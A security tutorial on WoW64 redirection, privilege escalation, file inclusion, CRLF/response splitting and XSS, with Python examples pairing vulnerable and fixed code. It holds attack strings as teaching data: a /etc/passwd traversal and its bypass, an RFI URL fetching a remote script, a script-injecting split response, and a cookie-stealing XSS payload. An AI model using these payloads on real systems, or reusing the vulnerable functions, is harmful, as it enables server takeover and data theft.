The SysWOW64 folder located in the Windows folder on the OS drive contains several applications to support 32-bit applications (e.g. cmd.exe, useful to register 32-bit Windows services, and odbcad32.exe, to register ODBC connections for 32-bit applications). 16-bit legacy applications for MS-DOS and early versions of Windows are usually incompatible with 64-bit versions of Windows Vista, 7 and 8, but can be run on a 16-bit or 32-bit Windows OS via Microsoft Virtual PC or DOSBox. 32-bit versions of Windows XP, Vista, 7, and 8, on the other hand, can usually run 16-bit apps with few to no problems.
The component that makes this possible on 32-bit Windows, Windows on Windows (WOW, built on the NT Virtual DOS Machine), is replaced in 64-bit Windows by WoW64, rendering nearly all 16-bit apps unexecutable.

Internet Explorer is implemented as both a 32-bit and a 64-bit application because of the large number of 32-bit ActiveX components on the Internet that would not be able to plug into the 64-bit version. The 32-bit version is used by default and the 64-bit version cannot be set to be the default browser.
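
A small Python helper for the situation the redirection rules above create for anyone running tools from a 32-bit process on 64-bit Windows (a 32-bit shell, agent or script host). This is an added example, not code from the original page: running_under_wow64() calls the real kernel32 IsWow64Process API through ctypes, while the two path/registry functions are a reimplementation of the documented default rules so they can be exercised on any platform; they are a model, not a call into WoW64, and the function and constant names are mine.

```python
import ctypes
import ntpath
import sys


def running_under_wow64():
    """Ask kernel32 whether this process is a 32-bit process on 64-bit Windows.
    Returns True/False on Windows and None elsewhere (the API does not exist)."""
    if sys.platform != "win32":
        return None
    kernel32 = ctypes.windll.kernel32
    kernel32.GetCurrentProcess.restype = ctypes.c_void_p
    kernel32.IsWow64Process.argtypes = [ctypes.c_void_p, ctypes.POINTER(ctypes.c_int)]
    kernel32.IsWow64Process.restype = ctypes.c_int
    flag = ctypes.c_int(0)
    if not kernel32.IsWow64Process(kernel32.GetCurrentProcess(), ctypes.byref(flag)):
        raise ctypes.WinError()
    return bool(flag.value)


def _redirect(path, old, new):
    """Swap the directory prefix `old` for `new`, case-insensitively, on a
    normalised Windows path. Returns None if `path` is not under `old`."""
    low = path.lower()
    if low == old.lower() or low.startswith(old.lower() + "\\"):
        return new + path[len(old):]
    return None


def path_seen_by_32bit_process(path, system_root=r"C:\Windows"):
    """Model of the file-system redirection described above (documented
    default rules only): System32 -> SysWOW64, sysnative -> System32,
    everything else, including both Program Files directories, untouched."""
    p = ntpath.normpath(path)
    system32 = ntpath.join(system_root, "System32")
    sysnative = ntpath.join(system_root, "sysnative")
    syswow64 = ntpath.join(system_root, "SysWOW64")
    return (_redirect(p, system32, syswow64)
            or _redirect(p, sysnative, system32)
            or p)


def registry_key_seen_by_32bit_process(key):
    """Model of the HKLM\\Software redirection: a 32-bit process asking for
    HKLM\\Software\\X is transparently sent to HKLM\\Software\\Wow6432Node\\X."""
    prefix = r"HKEY_LOCAL_MACHINE\Software"
    low = key.lower()
    if not low.startswith(prefix.lower() + "\\"):
        return key
    if low.startswith((prefix + r"\Wow6432Node").lower()):
        return key
    return prefix + r"\Wow6432Node" + key[len(prefix):]


if __name__ == "__main__":
    print("WoW64 process:", running_under_wow64())
    print(path_seen_by_32bit_process(r"C:\Windows\System32\cmd.exe"))
    print(path_seen_by_32bit_process(r"C:\Windows\Sysnative\cmd.exe"))
    print(registry_key_seen_by_32bit_process(r"HKEY_LOCAL_MACHINE\Software\Vendor\App"))
```

Treat the two model functions as the default rule, not as an oracle: real WoW64 exempts a few System32 subdirectories from redirection (drivers\etc is the usual example, which is why a 32-bit process still reads the right hosts file), and the registry has shared keys that are not redirected. The practical lesson is the one the text states: from a 32-bit process, spawn the 64-bit tools through %SystemRoot%\sysnative, because %SystemRoot%\System32 silently gives you the 32-bit copies.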

Privilege Escalation


Privilege escalation is the act of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. The result is that an application with more privileges than intended by the application developer or system administrator can perform unauthorized actions.
Privilege escalation means a user receives privileges they are not entitled to. These privileges can be used to delete files, view private information, or install unwanted programs such as malware. It usually occurs when a system has a bug that allows security to be bypassed or, alternatively, has flawed design assumptions about how it will be used. Privilege escalation occurs in two forms:
  1. Vertical privilege escalation, also known as privilege elevation, where a lower privilege user or application accesses functions or content reserved for higher privilege users or applications (e.g. Internet Banking users can access site administrative functions or the password for a smartphone can be bypassed.)
  2. Horizontal privilege escalation, where a normal user accesses functions or content reserved for other normal users (e.g. Internet Banking User A accesses the Internet bank account of User B)
Vertical Privilege Escalation 

This type of privilege escalation occurs when the user or process is able to obtain a higher level of access than an administrator or system developer intended, possibly by performing kernel-level operations.

Examples of vertical privilege escalation
In some cases a high-privilege application assumes that it will only be provided with input that matches its interface specification, and doesn't validate the input. An attacker may then be able to exploit this assumption so that unauthorized code is run with the application's privileges:
  • Some Windows services are configured to run under the Local System user account. A vulnerability such as a buffer overflow may be used to execute arbitrary code with privilege elevated to Local System. Alternatively, a system service that is impersonating a lesser user can elevate that user's privileges if errors are not handled correctly while the user is being impersonated (e.g. if the user has introduced a malicious error handler)
  • Under some legacy versions of the Microsoft Windows operating system, the All Users screensaver runs under the Local System account - any account that can replace the current screensaver binary in the file system or Registry can therefore elevate privileges.
  • In certain versions of the Linux kernel it was possible to write a program that would set its current directory to /etc/cron.d, request that a core dump be performed in case it crashes and then have itself killed by another process. The core dump file would have been placed at the program's current directory, that is, /etc/cron.d, and cron would have treated it as a text file instructing it to run programs on schedule. Because the contents of the file would be under attacker’s control, the attacker would be able to execute any program with root privileges.
  • Cross Zone Scripting is a type of privilege escalation attack in which a website subverts the security model of web browsers so that it can run malicious code on client computers.
  • There are also situations where an application can use other high privilege services and has incorrect assumptions about how a client could manipulate its use of these services. An application that can execute Command line or shell commands could have a Shell Injection vulnerability if it uses unvalidated input as part of an executed command. An attacker would then be able to run system commands using the application's privileges.
  • Texas Instruments calculators (particularly the TI-85 and TI-82) were originally designed to use only interpreted programs written in dialects of TI-BASIC; however, after users discovered bugs that could be exploited to allow native Z-80 code to run on the calculator hardware, TI released programming data to support third-party development. (This did not carry on to the ARM-based TI-Nspire, for which jailbreaks have been found but are still actively fought against by Texas Instruments.)
  • Some versions of the iPhone allow an unauthorised user to access the phone while it is locked.

Jailbreaking

A jailbreak is the act or tool used to perform the act of breaking out of a chroot or jail in UNIX-like operating systems or bypassing digital rights management (DRM).
In the former case, it allows the user to see files outside of the filesystem that the administrator intends to make available to the application or user in question. In the context of DRM, this allows the user to run arbitrarily defined code on devices with DRM as well as break out of chroot-like restrictions. The term originated with the iPhone/iOS jailbreaking community and has also been used as a term for PlayStation Portable hacking; these devices have repeatedly been subject to jailbreaks, allowing the execution of arbitrary code, and sometimes have had those jailbreaks disabled by vendor updates.
iOS systems including the iPhone, iPad, and iPod touch have been subject to iOS jailbreaking efforts since they were released, and continuing with each firmware update. iOS jailbreaking tools include the option to install Cydia, a third-party alternative to the App Store, as a way to find and install system tweaks and binaries. To prevent iOS jailbreaking, Apple has made the device boot ROM execute checks for SHSH blobs in order to disallow uploads of custom kernels and prevent software downgrades to earlier, jailbreakable firmwares. In an "untethered" jailbreak, the iBoot environment is changed to execute a boot ROM exploit and allow submission of a patched low level bootloader or hack the kernel to submit the jailbroken kernel after the SHSH check.
A similar method of jailbreaking exists for S60 Platform smartphones, which involves installing softmod-style patches which involves patching certain ROM files while loaded in RAM or edited firmware (similar to the M33 hacked firmware used for the PlayStation Portable) to circumvent restrictions on unsigned code. Nokia has since issued updates to curb unauthorised jailbreaking, in a manner similar to Apple.

Prevention Strategies

Operating systems and users can use the following strategies to reduce the risk of privilege escalation:
  • Data Execution Prevention
  • Address space layout randomization (to make it harder for buffer overruns to execute privileged instructions at known addresses in memory)
  • Running applications with least privilege (for example by running Internet Explorer with the Administrator SID disabled in the process token) in order to reduce the ability of buffer overrun exploits to abuse the privileges of an elevated user.
  • Requiring kernel mode code to be digitally signed.
  • Use of up-to-date antivirus software
  • Patching
  • Use of compilers that trap buffer overruns
  • Encryption of software and/or firmware components.
Horizontal Privilege Escalation

Horizontal privilege escalation occurs when an application allows the attacker to gain access to resources which normally would have been protected from that user. The result is that the application performs actions in a security context of the same privilege level as the developer or administrator intended, but as a different identity; this is effectively a limited form of privilege escalation (specifically, the unauthorized assumption of the capability of impersonating other users).

Examples of horizontal privilege escalation
This problem often occurs in web applications. Consider the following example:
  • User A has access to his/her bank account in an Internet Banking application.
  • User B has access to his/her bank account in the same Internet Banking application.
  • The vulnerability occurs when User A is able to access User B's bank account by performing some sort of malicious activity.
This malicious activity may be possible due to common web application weaknesses or vulnerabilities. Potential web application vulnerabilities or situations that may lead to this condition include:
  • Missing server-side authorization checks on object identifiers (e.g. an account number in the URL that the application looks up without verifying that it belongs to the logged-in user)
  • Predictable session IDs in the user's HTTP cookie
  • Session fixation
  • Cross-site scripting
  • Easily guessable passwords
  • Theft or hijacking of session cookies
  • Keystroke logging
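
The bank example from the list above, written out as an added illustration (this is not code from the original page): a lookup that trusts the account number from the request, the same lookup authorised against the server-side session identity, and the variant that removes the client-supplied identifier altogether. The Account data, ACCOUNTS table and user names are constructed sample data for the example.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Account:
    number: str
    owner: str      # user name of the authenticated customer who owns it
    balance: int


# Constructed sample data standing in for the bank's database.
ACCOUNTS = {
    "1001": Account("1001", "alice", 500),
    "1002": Account("1002", "bob", 9000),
}


class Forbidden(Exception):
    """Raised when the authenticated user may not see the requested object."""


def get_account_vulnerable(session_user, account_number):
    """The flaw: the account number comes from the request and is trusted.
    Any logged-in user who changes ?account=1001 to ?account=1002 in the URL
    sees Bob's account, even though session_user is sitting right there."""
    return ACCOUNTS[account_number]


def get_account(session_user, account_number):
    """Authorise against the identity stored in the server-side session.
    'Not found' and 'not yours' produce the same error so an attacker cannot
    enumerate which account numbers exist."""
    account = ACCOUNTS.get(account_number)
    if account is None or account.owner != session_user:
        raise Forbidden("no such account")
    return account


def accounts_for(session_user):
    """Better still: select by the session identity only, so there is no
    client-supplied identifier to tamper with in the first place."""
    return [a for a in ACCOUNTS.values() if a.owner == session_user]


if __name__ == "__main__":
    print("vulnerable:", get_account_vulnerable("alice", "1002"))
    try:
        get_account("alice", "1002")
    except Forbidden as e:
        print("checked:", e)
    print("own accounts:", accounts_for("alice"))
```

The same pattern applies to any identifier a client can edit (order numbers, document ids, user ids in a profile URL); the check belongs on the server, next to the data access, and must use the session's identity rather than anything the request says about itself.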
Preventing Privilege Escalation Vulnerabilities

Review those logs
Time-consuming, tedious, and absolutely necessary for the health of your network: review your log files. Once you understand what "normal" looks like for your network, you're more likely to spot dangerous abnormalities.
What should you look for? In two words: weird stuff. Examples: You know John is on vacation at Disney World, and his laptop is sitting in your office, but someone keeps logging into your network as John. Time to investigate. If, normally, your Web server can run six weeks at a time without requiring a reboot, but it rebooted itself three times last night, some attacker may be trying to perfect his buffer overflow attack against it. If your database server is locked in a closet in your server farm but the log files report a console login attempt on that server (which has no keyboard), investigate further. Get the idea?

Keep up-to-date on patches
Another painful but necessary task. We're surprised to see the Frethem virus spreading as we write this, because it works primarily on Internet Explorer systems that have not been updated in over a year. A diligent sys admin may patch daily. Lately, advisories about buffer overflows are being reported in the popular press. You can't assume "no one knows about them." Plug all known holes.

Use passphrases
We have often advised in LiveSecurity articles, "Use strong passwords." The problem with passwords that are cryptographically strong (e.g., "1@3gg]+nP915f~") is that no one can remember them, and they're hard to type. A nice balance between that and a too-easy password (e.g., "John") is the pass phrase. Try using bits of poetry, lines from plays or movies, anything lengthy but memorable. In Star Wars: A New Hope, an embarrassed Han Solo tells his mocking sidekick Chewbacca, "Laugh it up, fuzzball." Modified slightly to "L4ugh it up, Fu22ball!" you have a strong passphrase, hard for an attacker to brute force or guess, but easy for you to live with. Pick your own favorite; any example printed in an article, including this one, is already in attackers' wordlists. Just don't read it from anything hanging near your workstation.

Manage settings aggressively
Sure, it's easier to set your firewall to permit "Any" to "all." But that's not secure. Work out a security policy that grants employees the minimum amount of access they need to do their jobs. Then set your routers, switches, and firewalls to enforce the policy. While you're at it, consider installing interdepartmental firewalls: that way, if an attacker breaks in somewhere, you've limited the damage to a smaller network segment.

Further countermeasures are really up to application developers. Buffer overflows don't succeed in a well-written program. But you can't do a lot about that right now. What you can do is make sure your people use strong credentials, then protect those credentials.

File Inclusion


A file inclusion attack is an attack in which the attacker makes the web application include, and therefore execute, a file of the attacker's choosing. It happens when user-supplied data is used to build the path or URL passed to an include function without proper filtering. Through this vulnerability the attacker can run scripts, read files and steal data; when the vulnerable application is written in PHP, it usually ends in arbitrary command execution on the server.
File inclusion attacks are of two types:
  1. Local File Inclusion.
  2. Remote File Inclusion.
Local File Inclusion (LFI)

In LFI the attacker takes advantage of improper filtering to include a file that already exists on the server. The following PHP is vulnerable to LFI:

<?php
$file = isset($_GET['file']) ? $_GET['file'] : '';
if($file !== '')
{
    // vulnerable: $file is used unfiltered in the include path
    include("pages/$file");
}
else
{
    include("index.php");
}
?>

The original request looks like this:
http://www.test.com/index.php?file=contact.php
The attacker instead requests:
http://www.test.com/index.php?file=../../../../etc/passwd
The include() then opens pages/../../../../etc/passwd, which (given enough ../ segments) resolves to /etc/passwd, and the server's account list is returned in the page: user names, UIDs, home directories and shells. The password hashes themselves live in /etc/shadow on modern systems, but the account list is still valuable reconnaissance, and the same trick reads any file the web server user can open, including the application's own source and configuration.
The countermeasure usually suggested is to strip traversal sequences from $file:
$file = str_replace('../', '', $_GET['file']);
This blocks the request above, but it is not a real fix. str_replace makes a single, non-recursive pass, so the input ....//....//....//....//etc/passwd is turned into ../../../../etc/passwd by the very line meant to neutralise it. The robust approach is to map the parameter to an allowlist of known page names and, where that is impossible, to resolve the final path with realpath() and verify that it is still inside the intended directory.

Remote File Inclusion (RFI)

Remote File Inclusion (RFI) is an attack that targets the computer servers that run Web sites and their applications. RFI exploits are most often attributed to the PHP programming language used by many large firms including Facebook and SugarCRM. However, RFI can manifest itself in other environments and was in fact introduced initially as "SHTML injection". RFI works by exploiting applications that dynamically reference external scripts indicated by user input without proper sanitation. As a consequence, the application can be instructed to include a script hosted on a remote server and thus execute code controlled by an attacker. The executed scripts can be used for temporary data theft or manipulation, or for a long term takeover of the vulnerable server.
Remote File Inclusion (RFI) is caused by insufficient validation of user input provided as parameters to a Web application. Parameters that are vulnerable to RFI enable an attacker to include code from a remotely hosted file in a script executed on the application’s server. Since the attacker’s code is thus executed on the Web server it might be used for temporary data theft or manipulation, or for a long term takeover of the vulnerable server.
The RFI attack vector includes a URL reference to the remotely hosted code. Most attacks include two steps.
  • In the first step, the attack vector references a simple validation script, usually capable of printing some distinguished output to the HTML page. If the validation script is successfully executed by the server under attack,
  • The attacker proceeds with a second vector that references the actual payload script. The servers hosting the script are either compromised servers or file sharing services.
The remote file inclusion attack allows an attacker to execute a malicious file or script hosted anywhere.
The vulnerability exploits poor validation checks in websites and leads to code execution on the server; with an RFI attack an attacker can gain full access to the server.
Suppose the vulnerable page is:
http://www.test.com/index.php?page=office
Here the application takes the page parameter and passes it to PHP's include function to load the corresponding file from the server.
If the PHP setting allow_url_include is enabled, the attacker can make the server fetch and execute a remote script instead of the genuine page:
http://www.test.com/index.php?page=http://www.hackersite.com/maliciousscript.txt

Preventing File Inclusions (RFI - LFI) Vulnerabilities

The most common protection mechanism against RFI attacks is based on signatures for known vulnerabilities in a Web Application Firewall (WAF). Detection and blocking of such attacks can be enhanced by creating a blacklist of attack sources and a blacklist of URLs of remotely included malicious scripts:
  • Advanced knowledge of RFI attack sources enables the WAF to block an attack before it even begins.
  • A blacklist of the referenced URLs enables the WAF to block exploits targeting zero-day vulnerabilities in applications.
  • The blacklist of IPs constructed from RFI attack observations can be used to block other types of attacks issued from the same malicious sources.
Signatures and blacklists are detection, not a fix. The fix lives in the application and its configuration: never pass user input to include or require, map the parameter to an allowlist of known pages instead, and keep allow_url_include=Off in php.ini (its default in modern PHP) so that include() cannot fetch http:// URLs at all; where nothing needs it, turn allow_url_fopen off as well.
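
The two fixes recommended above for LFI and RFI, and a demonstration of why the str_replace() countermeasure fails, as an added example in Python (not code from the original page; the page names, PAGES allowlist and BASE_DIR are assumptions for the example). naive_strip() mirrors the PHP str_replace('../', '', $file) line exactly; the two page_path_* functions are the allowlist and the realpath containment check.

```python
import os

# Allowlist of page names the application actually has (assumed for this example).
PAGES = {"index", "contact", "office"}
BASE_DIR = "/srv/www/pages"   # assumed location of the include directory


def naive_strip(name):
    """Mirror of str_replace('../', '', $file): one non-recursive pass, which is
    why a doubled sequence like '....//' survives it as '../'."""
    return name.replace("../", "")


def page_path_allowlisted(name):
    """Fix 1: the parameter selects a page from a fixed set; it never becomes a path."""
    if name not in PAGES:
        raise ValueError("unknown page")
    return os.path.join(BASE_DIR, name + ".php")


def page_path_contained(name, base_dir=BASE_DIR):
    """Fix 2, for when an allowlist is impossible: resolve the final path and
    prove it is still inside base_dir. URL/stream wrappers (http://, php://)
    and NUL bytes are rejected up front, since they are never file names."""
    if "://" in name or "\x00" in name:
        raise ValueError("wrappers and NUL bytes are not file names")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, name))
    if not candidate.startswith(base + os.sep):
        raise ValueError("path escapes the pages directory")
    return candidate


if __name__ == "__main__":
    print(naive_strip("....//....//....//....//etc/passwd"))   # the 'fix' produces ../../../../etc/passwd
    for probe in ("contact.php", "../../../../etc/passwd",
                  "http://www.hackersite.com/maliciousscript.txt"):
        try:
            print(probe, "->", page_path_contained(probe))
        except ValueError as e:
            print(probe, "-> rejected:", e)
```

Prefer the allowlist wherever the set of includable pages is known, which for an application's own page router it always is; the containment check is the fallback for genuinely user-named files, and even then it should be combined with a check on the file extension so that an uploaded image cannot be included as code.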


HTTP response splitting


HTTP response splitting is a form of web application vulnerability, resulting from the failure of the application or its environment to properly sanitize input values. It can be used to perform cross-site scripting attacks, cross-user defacement, web cache poisoning, and similar exploits.

The attack consists of making the server print a carriage return (CR, ASCII 0x0D) line feed (LF, ASCII 0x0A) sequence followed by content supplied by the attacker in the header section of its response, typically by including them in input fields sent to the application. Per the HTTP standard (RFC 2616), headers are separated by one CRLF and the response's headers are separated from its body by two. Therefore, the failure to remove CRs and LFs allows the attacker to set arbitrary headers, take control of the body, or break the response into two or more separate responses—hence the name.

CRLF Injection

CRLF refers to the special character elements "Carriage Return" and "Line Feed". These elements are embedded in HTTP headers and other software code to signify an End of Line (EOL) marker. Many internet protocols, including MIME (e-mail), NNTP (newsgroups) and more importantly HTTP use CRLF sequences to split text streams into discrete elements. Web application developers split HTTP and other headers based on where CRLF is located. Exploits occur when an attacker is able to inject a CRLF sequence into an HTTP stream. By introducing this unexpected CRLF injection, the attacker is able to maliciously exploit CRLF vulnerabilities in order to manipulate the web application's functions.
A more formal name for CRLF Injection is Improper Neutralization of CRLF Sequences. Because CRLF injection is frequently used to split HTTP responses, it can also be designated as HTTP Response Splitting or Improper Neutralization of CRLF Sequences in HTTP Headers.

Key Concepts of CRLF Injection

CRLF Injection is a software application coding vulnerability that occurs when an attacker injects a CRLF character sequence where it is not expected. When CRLF Injection is used to split a HTTP response header it is referred to as HTTP Response Splitting. CRLF Injection vulnerabilities result from data input that is not neutralized, incorrectly neutralized, or otherwise unsanitized.
Attackers provide specially crafted text streams with CRLF injections in order to trick the web application to perform unexpected and potentially harmful actions ranging from medium to high severity. Attackers exploit the CRLF Injection vulnerability by injecting CRLF sequences in order to split a text stream to embed text sequences that the web application is not expecting. These unexpected CRLF injections can result in a security breach and cause material harm.
CRLF Injection exploits security vulnerabilities at the application layer. By exploiting a CRLF Injection flaw in an HTTP response, for example, attackers can modify application data, compromising integrity and enabling the exploitation of the following vulnerabilities:
  • XSS or Cross-Site Scripting vulnerabilities
  • Proxy and web server cache poisoning
  • Web site defacement
  • Hijacking the client's session
  • Client web browser poisoning
Explaining CRLF Injection Through Examples

Let's examine how CRLF injections cause damage by looking at one of the most basic examples of a CRLF attack: adding fake entries to log files. Suppose a vulnerable application accepts unsanitized or improperly neutralized data and writes it to a system log file. An attacker supplies the following input:

Because this error is fake, a sysadmin may waste a lot of time troubleshooting a non-existent error. An attacker could use this kind of decoy to distract the admin while attacking the system somewhere else.
Another way to illustrate how CRLF injections can cause severe harm is through an application that accepts a file name as user input and then executes a relatively harmless command on that file, such as "ls -a". If the application is vulnerable to CRLF injection because of improperly neutralized or unsanitized data input, an attacker could provide the following input:

This CRLF injection could wipe out the entire file system if the application were running with root privileges on a Linux/Unix system, because the shell treats the newline exactly like a semicolon: whatever follows it is a second command.
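
The "ls -a" scenario above and the shell injection case from the privilege escalation examples earlier on this page are the same bug, shown here in one added Python example (not code from the original page). The file name and the injected payload are constructed for the demo, and "echo" stands in for "ls -a" so that the injected second command is visible but harmless.

```python
import re
import shlex
import subprocess

# Only plain file names: no separators, no shell metacharacters, no control characters.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,254}")


def _run(argv_or_cmd, shell):
    return subprocess.run(argv_or_cmd, shell=shell, capture_output=True, text=True).stdout


def show_file_vulnerable(filename):
    """The flaw from the text: the file name is pasted into a command line that
    /bin/sh then parses, so a newline (or ';', '|', '&&', '$(...)') inside the
    name becomes a second command, run with the application's privileges."""
    return _run("echo " + filename, shell=True)


def show_file_argv(filename):
    """Fix 1: no shell at all. The name travels as a single argv element, so a
    newline is just a character inside one argument."""
    return _run(["echo", filename], shell=False)


def show_file_quoted(filename):
    """Fix 2: if a shell is unavoidable, quote the argument for it. Equivalent to
    fix 1 as far as the shell is concerned, but fix 1 is harder to get wrong."""
    return _run("echo " + shlex.quote(filename), shell=True)


def validate_filename(filename):
    """Fix 3 (defence in depth): allowlist the value before it goes anywhere.
    Reject rather than strip; stripping is what the LFI countermeasure got wrong."""
    if not SAFE_NAME.fullmatch(filename):
        raise ValueError("rejected filename: %r" % filename)
    return filename


if __name__ == "__main__":
    injected = "a.txt\necho INJECTED"        # constructed attacker input: CRLF-style split
    print(repr(show_file_vulnerable(injected)))   # second line is the attacker's command output
    print(repr(show_file_argv(injected)))         # newline stays inside the one argument
    print(repr(show_file_quoted(injected)))
```

With "rm -rf /" in place of "echo INJECTED" the vulnerable version does exactly what the text describes; the argv version would merely try to print a file name containing those characters.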

Preventing HTTP Response Splitting Vulnerabilities

Fortunately, HTTP response splitting is easy to prevent:
Always follow the rule of never trusting user input.
Sanitize and neutralize all user-supplied data, or properly encode output placed in HTTP headers, so that CR and LF characters can never reach a header. In practice this means rejecting (or URL-encoding as %0D%0A) any CR or LF in a value that goes into a Location, Set-Cookie or similar header, and using the framework's header API, which refuses such values, rather than writing raw header strings.
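
An added Python example (not code from the original page) of the splitting described above and of the check that prevents it: a redirect that copies a user-controlled target into the Location header, the same redirect refusing CR/LF, and a minimal HTTP/1.1 response parser standing in for the proxy or browser so you can see that the byte stream now contains two responses. The ATTACK value is a constructed attacker input built for this example.

```python
import re

# Constructed attacker value for the redirect target: it closes the 302 and
# appends a complete second response carrying a script of the attacker's choice.
ATTACK = ("/home\r\nContent-Length: 0\r\n\r\n"
          "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: 25\r\n\r\n"
          "<script>alert(1)</script>")


def _format_redirect(target):
    return ("HTTP/1.1 302 Found\r\n"
            "Location: " + target + "\r\n"
            "Content-Length: 0\r\n"
            "\r\n")


def redirect_vulnerable(target):
    """Copies the user-controlled target straight into the header section."""
    return _format_redirect(target)


def redirect_safe(target):
    """Refuses any value that could end a header line or the header block.
    (Percent-encoding CR/LF is the other acceptable option; stripping is not,
    since it silently changes the redirect target.)"""
    if re.search(r"[\r\n\x00]", target):
        raise ValueError("control characters in header value")
    return _format_redirect(target)


def parse_responses(raw):
    """Minimal HTTP/1.1 response parser, used to show what a proxy or browser
    sees: one response or several. Each element is (status_line, headers, body);
    parsing stops at the first byte that does not begin a status line."""
    out = []
    rest = raw
    while rest.startswith("HTTP/"):
        head, sep, rest = rest.partition("\r\n\r\n")
        if not sep:
            break
        lines = head.split("\r\n")
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        length = int(headers.get("content-length", "0"))
        body, rest = rest[:length], rest[length:]
        out.append((lines[0], headers, body))
    return out


if __name__ == "__main__":
    for status, headers, body in parse_responses(redirect_vulnerable(ATTACK)):
        print(status, headers, repr(body))
    try:
        redirect_safe(ATTACK)
    except ValueError as e:
        print("rejected:", e)
```

The second, attacker-authored response is what a caching proxy may store against whatever URL the victim requests next, which is how the cache poisoning and cross-user defacement listed above come about.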


Cross-Site Scripting (XSS)


Cross-Site Scripting (also known as XSS) is one of the most common application-layer web attacks. XSS targets the scripts that run on the client side (in the user's web browser) rather than on the server. It is possible because a browser executes whatever script a page's HTML contains, so a web application that copies untrusted data into its HTML lets an attacker add script of their own. The concept of XSS is to manipulate the client-side content of a web application so that the attacker's script executes, either every time the page is loaded or whenever an associated event fires.
XSS is among the most common security vulnerabilities in software today. This should not be the case, as XSS is easy to find and easy to fix. Its consequences range from page tampering to theft of session data and other sensitive information.

Key Concepts of a Cross-Site Scripting Attack
  1. XSS is a Web-based attack performed on vulnerable Web applications
  2. In XSS attacks, the victim is the user and not the application
  3. In XSS attacks, malicious content is delivered to users using JavaScript
Explaining Cross-Site Scripting

An XSS vulnerability arises when Web applications take data from users and dynamically include it in Web pages without first properly validating the data. XSS vulnerabilities allow an attacker to execute arbitrary commands and display arbitrary content in a victim user's browser. A successful XSS attack leads to an attacker controlling the victim’s browser or account on the vulnerable Web application. Although XSS is enabled by vulnerable pages in a Web application, the victims of an XSS attack are the application's users, not the application itself. The potency of an XSS vulnerability lies in the fact that the malicious code executes in the context of the victim's session, allowing the attacker to bypass normal security restrictions.

XSS Attack Examples
  • Reflective XSS - There are many ways in which an attacker can entice a victim into initiating a reflective XSS request. For example, the attacker could send the victim a misleading email with a link containing malicious JavaScript. If the victim clicks on the link, the HTTP request is initiated from the victim's browser and sent to the vulnerable Web application. The malicious JavaScript is then reflected back to the victim's browser, where it is executed in the context of the victim user's session.
  • Persistent XSS - Consider a Web application that allows users to enter a user name which is displayed on each user’s profile page. The application stores each user name in a local database. A malicious user notices that the Web application fails to sanitize the user name field and inputs malicious JavaScript code as part of their user name. When other users view the attacker’s profile page, the malicious code automatically executes in the context of their session.
Identifying Cross-Site Scripting Vulnerabilities

XSS vulnerabilities may occur if:
  • Input coming into Web applications is not validated
  • Output to the browser is not HTML encoded
Impact of Cross-Site Scripting

When attackers succeed in exploiting XSS vulnerabilities, they can gain access to account credentials. They can also spread Web worms or access the user’s computer and view the user’s browser history or control the browser remotely. After gaining control to the victim’s system, attackers can also analyze and use other intranet applications.
By exploiting XSS vulnerabilities, an attacker can perform malicious actions, such as:
  • Hijack an account
  • Spread Web worms
  • Access browser history and clipboard contents
  • Control the browser remotely
  • Scan and exploit intranet appliances and applications
Preventing Cross Site Scripting (XSS) Vulnerabilities

XSS is prevented by treating every value that is not known to be safe as untrusted: validating it on input and, above all, encoding it on output for the context it lands in. Sources that are never safe include:
  • HTTP referrer objects
  • The URL
  • GET parameters
  • POST parameters
  • window.location
  • document.referrer
  • document.location
  • document.URLUnencoded
  • All headers
  • Cookie data
  • Potentially data from your own database (if not properly validated on input)
Preventing XSS is laborious: every value from the sources above must be handled, and attack payloads come in many encodings and variations, so a blacklist of known bad strings always misses some.
If it is possible to whitelist the data being input, then do so with a strict filter.
Alternately, if the data is never output to a user's browser, then it cannot be used in an XSS attack. Be careful relying on this method, as other attacks, such as HTTP response splitting or SQL injection, use the same untrusted data sources.
The best defense is to escape all untrusted data at the point of output, using the encoding that matches where it is placed: HTML-entity encoding in element content and in quoted attributes, JavaScript string encoding inside scripts, URL encoding inside URLs. The level of escaping depends on the site: some sites need to let users add a limited set of HTML tags and must run that markup through an HTML sanitiser, while others have no need of such functionality and can encode everything.
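
Contextual output encoding as described above, shown as an added Python example (not code from the original page) on the persistent-XSS scenario of a stored user name. It covers element content, a quoted attribute and a JavaScript string, and includes the unquoted-attribute case to show that entity encoding alone is not enough when the surrounding HTML is wrong. PAYLOAD and the other inputs are constructed attacker values for the example.

```python
import html
import json

# Constructed attacker-controlled user name, as in the persistent XSS example above.
PAYLOAD = "<script>alert(document.cookie)</script>"


def profile_vulnerable(username):
    """Copies the stored name into the page as-is: the browser runs it."""
    return "<h1>Profile of " + username + "</h1>"


def profile_html(username):
    """Element-content context: HTML-entity encode. quote=True also encodes
    both kinds of quote, so the same helper is safe inside quoted attributes."""
    return "<h1>Profile of " + html.escape(username, quote=True) + "</h1>"


def attr_unquoted_still_vulnerable(username):
    """Entity encoding is not enough when the attribute is unquoted: a space
    ends the value and what follows becomes a new attribute, e.g. an event handler."""
    return "<input name=user value=" + html.escape(username, quote=True) + ">"


def attr_quoted(username):
    """Quoted-attribute context: entity encoding plus the surrounding quotes,
    so neither a space nor an encoded quote can leave the value."""
    return '<input name="user" value="' + html.escape(username, quote=True) + '">'


def script_string(username):
    """JavaScript string context: JSON-encode (escapes quotes and backslashes),
    then break up '</' so the value cannot close the <script> element early."""
    return "<script>var user = " + json.dumps(username).replace("</", "<\\/") + ";</script>"


if __name__ == "__main__":
    print(profile_vulnerable(PAYLOAD))
    print(profile_html(PAYLOAD))
    print(attr_unquoted_still_vulnerable("x onmouseover=alert(1)"))
    print(attr_quoted('x" onmouseover="alert(1)'))
    print(script_string(PAYLOAD))
```

The rule of thumb: pick the encoder by where the value is going, not by what the value looks like; a template engine that auto-escapes HTML still needs the JSON/JavaScript encoder for values placed inside a script block, and a URL encoder for values placed inside an href.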


Difference between 32-bit and 64-bit


What is Bits?
The number of bits in a processor refers to the width of its general-purpose registers, which sets the size of the integers it handles natively and of the memory addresses it can form.

What is 32 Bit ?
